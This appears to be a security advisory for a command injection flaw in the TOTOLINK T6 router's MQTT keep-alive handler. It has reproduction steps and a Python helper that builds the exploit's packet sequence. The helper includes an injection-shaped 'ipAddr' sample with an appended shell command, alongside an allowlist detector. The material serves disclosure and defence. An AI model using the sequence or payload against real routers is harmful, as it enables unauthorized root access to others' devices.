TOTOLINK T6 Command Injection Vulnerability in MQTT Packet Handler

Vulnerability

A critical command injection vulnerability has been identified in the TOTOLINK T6 router running firmware version 4.1.5cu.748. The flaw is in the MQTT packet handler function 'ckeckKeepAlive' in the 'wireless.so' library: data taken from an attacker-controlled MQTT packet reaches a shell command without sanitisation. A remote attacker who can publish to the router's MQTT broker can therefore inject commands and achieve unauthorized command execution on the device.

Impact

Successful exploitation gives the attacker arbitrary command execution on the affected device. In the published proof-of-concept, the injected commands run as the root user and are used to gain unauthorized access through the Telnet service.

Reproduction

To reproduce this vulnerability, first ensure that the device is running the affected firmware version. The exploitation then proceeds in four steps:

1. Connect to the MQTT broker on the router.
2. Publish a message to the 'totolink/router/setWiFiMeshConfig' topic to set the specific value that enables the command injection.
3. After confirming the configuration change, upload a file named 'meshInfo.ini' to the device by publishing to the 'totolink/router/updateWifiInfo' topic.
4. Send the command injection payload through the 'totolink/router/ckeckKeepAlive' topic, using the 'ipAddr' parameter to carry the injected command.

The injected command is executed on the router. In the proof-of-concept it writes a file to the '/tmp' directory, which can then be accessed via Telnet.
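The exchange above, as an added example that is not part of the original advisory or TOTOLINK's code: it encodes and decodes MQTT 3.1.1 PUBLISH packets for the three topics named in the steps, returns them in the order the procedure requires, and applies the allowlist check a defender (or the handler itself) would want on the 'ipAddr' field. The payload layout (a JSON object carrying 'ipAddr'), the sample addresses and the injection-shaped sample are assumptions; the advisory names only the topics and the parameter, and the bodies of the setWiFiMeshConfig and updateWifiInfo messages are supplied by the caller because the advisory does not give them.

```python
import json
import re

# Topics named in the advisory's reproduction steps.
TOPIC_MESH = "totolink/router/setWiFiMeshConfig"
TOPIC_UPDATE = "totolink/router/updateWifiInfo"
TOPIC_KEEP = "totolink/router/ckeckKeepAlive"


def encode_remaining_length(n: int) -> bytes:
    """MQTT variable-length integer: 7 bits per byte, 0x80 as continuation bit."""
    out = bytearray()
    while True:
        byte = n % 128
        n //= 128
        if n > 0:
            byte |= 0x80
        out.append(byte)
        if n == 0:
            return bytes(out)


def decode_remaining_length(buf: bytes, pos: int):
    """Return (value, position after the field); MQTT allows at most 4 bytes."""
    mult, value = 1, 0
    for i in range(4):
        b = buf[pos + i]
        value += (b & 0x7F) * mult
        if not b & 0x80:
            return value, pos + i + 1
        mult *= 128
    raise ValueError("malformed remaining length")


def build_publish(topic: str, payload: bytes) -> bytes:
    """MQTT 3.1.1 PUBLISH at QoS 0 (no packet identifier in the variable header)."""
    t = topic.encode()
    body = len(t).to_bytes(2, "big") + t + payload
    return bytes([0x30]) + encode_remaining_length(len(body)) + body


def parse_publish(pkt: bytes):
    """Return (topic, payload) from a PUBLISH packet; reject anything else."""
    if pkt[0] >> 4 != 3:
        raise ValueError("not a PUBLISH packet")
    qos = (pkt[0] >> 1) & 0x03
    rem, pos = decode_remaining_length(pkt, 1)
    end = pos + rem
    if end != len(pkt):
        raise ValueError("remaining length does not match packet size")
    tlen = int.from_bytes(pkt[pos:pos + 2], "big")
    topic = pkt[pos + 2:pos + 2 + tlen].decode()
    pos += 2 + tlen
    if qos > 0:
        pos += 2  # skip the packet identifier
    return topic, pkt[pos:end]


def exploit_sequence(mesh_cfg: bytes, mesh_ini: bytes, keepalive_json: bytes):
    """The three publishes, in the order the advisory describes.

    The bodies are caller-supplied: the advisory does not state the mesh
    configuration value or the meshInfo.ini contents, so none are guessed here.
    """
    return [
        build_publish(TOPIC_MESH, mesh_cfg),
        build_publish(TOPIC_UPDATE, mesh_ini),
        build_publish(TOPIC_KEEP, keepalive_json),
    ]


DOTTED_QUAD = re.compile(r"(\d{1,3}\.){3}\d{1,3}")


def is_suspicious_keepalive(pkt: bytes) -> bool:
    """Flag a ckeckKeepAlive publish whose ipAddr is not a plain IPv4 literal.

    Allowlisting the expected shape is the check the handler should make before
    the value reaches a shell; the same rule works as a detection on captured
    broker traffic. Assumes a JSON object payload with an 'ipAddr' key.
    """
    topic, payload = parse_publish(pkt)
    if topic != TOPIC_KEEP:
        return False
    try:
        ip = json.loads(payload).get("ipAddr", "")
    except (ValueError, AttributeError):
        return True  # unparseable payload on a sensitive topic deserves a look
    return not isinstance(ip, str) or DOTTED_QUAD.fullmatch(ip) is None


# Constructed samples: a benign keep-alive and an injection-shaped one.
# The real proof-of-concept payload is not reproduced here.
BENIGN = build_publish(TOPIC_KEEP, json.dumps({"ipAddr": "192.168.0.2"}).encode())
INJECT = build_publish(TOPIC_KEEP, json.dumps({"ipAddr": "192.168.0.2;echo x > /tmp/x"}).encode())

if __name__ == "__main__":
    for label, pkt in (("benign", BENIGN), ("inject", INJECT)):
        print(label, parse_publish(pkt)[0], "suspicious" if is_suspicious_keepalive(pkt) else "ok")
```

The packet builder is deliberately limited to QoS 0, which is enough to reach a subscribing handler; the parser still skips a packet identifier so that captured QoS 1 or 2 publishes decode correctly. Rejecting anything that is not a dotted quad is stricter than a metacharacter blocklist and is the form of check that would have prevented the injection.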

Added: Jul 22, 2025, 3:17 AM
Updated: Jul 22, 2025, 3:17 AM

Vulnerability Rating

Custom Algorithm

spread: 2.6
impact: 7.5
exploitability: 9.1
remediation: 7.7
relevance: 0.3
threat: 6.5
urgency: 2.9
incentive: 9.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.